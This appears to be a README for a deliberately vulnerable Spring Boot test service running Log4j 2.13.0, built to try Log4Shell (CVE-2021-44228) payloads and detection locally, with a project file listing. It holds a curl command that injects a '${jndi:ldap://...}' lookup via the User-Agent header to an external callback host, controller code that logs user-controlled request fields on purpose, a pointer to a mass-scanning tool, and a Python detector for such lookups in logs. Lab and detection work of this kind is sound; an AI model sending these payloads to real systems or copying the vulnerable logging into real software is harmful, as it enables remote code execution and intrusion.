Introduction
# CVE-2021-44228 Spring Boot Test Service
This is a dirty-hack Spring Boot hello-world project for testing your tooling, payloads and detection capabilities locally before you hit production targets with them.
The configured Log4j version is 2.13.0.
## Building the docker image
```bash
bash build.sh
```
## Running the docker image
```bash
docker run -p 8080:8080 dwdi/log4shell
```
## Testing / Triggering CVE-2021-44228
If you don't have Burp Collaborator running in the garage, you can visit this site to get a similar experience: https://interactsh.com
```bash
curl -s --max-time 20 localhost:8080 -H 'User-Agent: ${jndi:ldap://<some_custom_identifier>.<your_generated_subdomain>.interactsh.com/a}' > /dev/null
```
### Scanner tool
Optionally, you can use this awesome repo for performing local/mass scanning: https://github.com/adilsoybali/Log4j-RCE-Scanner
### Trigger locations
This vulnerability is all about forcing a user-controlled value to be logged by the vulnerable logging framework. With this in mind, this simple dummy application supports two HTTP verbs (GET/POST) and a bunch of injection locations:
```java
@GetMapping("/")
public String index(HttpServletRequest request) {
    logger.info("Request URL: " + request.getRequestURL());
    logger.info("Request URI: " + request.getRequestURI());
    logger.info("Request Method: " + request.getMethod());
    logger.info("Request Query String: " + request.getQueryString());
    logger.info("Request Protocol: " + request.getProtocol());
    logger.info("Request Remote Address: " + request.getRemoteAddr());
    logger.info("Request Remote Host: " + request.getRemoteHost());
    logger.info("Request Remote Port: " + request.getRemotePort());
    logger.info("Request User Agent: " + request.getHeader("User-Agent"));
    return "Log4J2 is working!";
}
```
```java
@PostMapping("/")
public String post(HttpServletRequest request, @RequestBody String body) {
    logger.info("Request URL: " + request.getRequestURL());
    logger.info("Request URI: " + request.getRequestURI());
    logger.info("Request Method: " + request.getMethod());
    logger.info("Request Query String: " + request.getQueryString());
    logger.info("Request Protocol: " + request.getProtocol());
    logger.info("Request Remote Address: " + request.getRemoteAddr());
    logger.info("Request Remote Host: " + request.getRemoteHost());
    logger.info("Request Remote Port: " + request.getRemotePort());
    logger.info("Request User Agent: " + request.getHeader("User-Agent"));
    logger.info("Request Body: " + body); // mind the extra request body
    return "Log4J2 is working!";
}
```
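A log-side check for the trigger locations above, as an added example that is not part of this project: it scans the lines written by the two handlers and reports which logged field carried a `${jndi:...}` string. The timestamp/level prefix, the `.example` hosts and the name `find_jndi_lookups` are assumptions, as is the lookup text still being present in the written line.

```python
import re
from urllib.parse import unquote

# Message prefixes written by the GET and POST handlers of the test controller.
FIELD_RE = re.compile(
    r"Request (URL|URI|Method|Query String|Protocol|Remote Address|"
    r"Remote Host|Remote Port|User Agent|Body): (.*)$"
)
# Plain lookup form from the page's curl command: ${jndi:<scheme>://<host>...}
# Log4j lower-cases the lookup prefix, so the match is case-insensitive.
# Nested lookup expressions are not resolved by this pattern.
JNDI_RE = re.compile(r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^/:}\s]+)", re.I)

# Constructed sample lines; the prefix layout is assumed, not taken from log4j.xml.
SAMPLE_LOG = [
    "2021-12-13 10:00:01 INFO HelloController - Request URI: /",
    "2021-12-13 10:00:01 INFO HelloController - Request Query String: "
    "q=%24%7Bjndi%3Aldap%3A%2F%2Fqs.callback.example%2Fa%7D",
    "2021-12-13 10:00:01 INFO HelloController - Request User Agent: "
    "${jndi:ldap://ua.callback.example/a}",
    "2021-12-13 10:00:02 INFO HelloController - Request User Agent: curl/7.79.1",
    "2021-12-13 10:00:03 INFO HelloController - Request Body: "
    "${jndi:ldap://body.callback.example/a}",
]


def find_jndi_lookups(log_lines):
    """Return one finding per logged field that contains a JNDI lookup string."""
    findings = []
    for lineno, line in enumerate(log_lines, start=1):
        field = FIELD_RE.search(line)
        if not field:
            continue
        name, value = field.groups()
        # getRequestURI()/getQueryString() return the undecoded value, so the
        # logger saw the encoded text; decode once and flag such hits separately.
        for candidate, encoded in ((value, False), (unquote(value), True)):
            hit = JNDI_RE.search(candidate)
            if hit:
                findings.append({
                    "line": lineno, "field": name,
                    "scheme": hit["scheme"].lower(), "host": hit["host"].lower(),
                    "percent_encoded": encoded,
                })
                break
    return findings
```

Matching the `host` values against the identifiers used in the test requests shows which injection location each callback belongs to.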
Contribution / improvements are welcome.
Sorry for code quality :) this project is not for showoff but to share/help.
File snapshot
```
[4.0K] /data/pocs/e9b6afb3753424e80dd33efac4e690dba7160fba
├── [ 722] build.gradle
├── [ 195] build.sh
├── [ 191] Dockerfile
├── [4.0K] gradle
│   └── [4.0K] wrapper
│       ├── [ 54K] gradle-wrapper.jar
│       └── [ 200] gradle-wrapper.properties
├── [5.8K] gradlew
├── [2.9K] gradlew.bat
├── [1.0K] LICENSE
├── [ 996] log4j.xml
├── [9.7K] mvnw
├── [6.2K] mvnw.cmd
├── [1.5K] pom.xml
├── [2.6K] README.md
├── [ 33] settings.gradle
└── [4.0K] src
    ├── [4.0K] main
    │   └── [4.0K] java
    │       └── [4.0K] com
    │           └── [4.0K] example
    │               └── [4.0K] springboot
    │                   ├── [ 829] Application.java
    │                   └── [1.9K] HelloController.java
    └── [4.0K] test
        └── [4.0K] java
            └── [4.0K] com
                └── [4.0K] example
                    └── [4.0K] springboot
                        ├── [ 746] HelloControllerIT.java
                        └── [1017] HelloControllerTest.java

13 directories, 18 files
```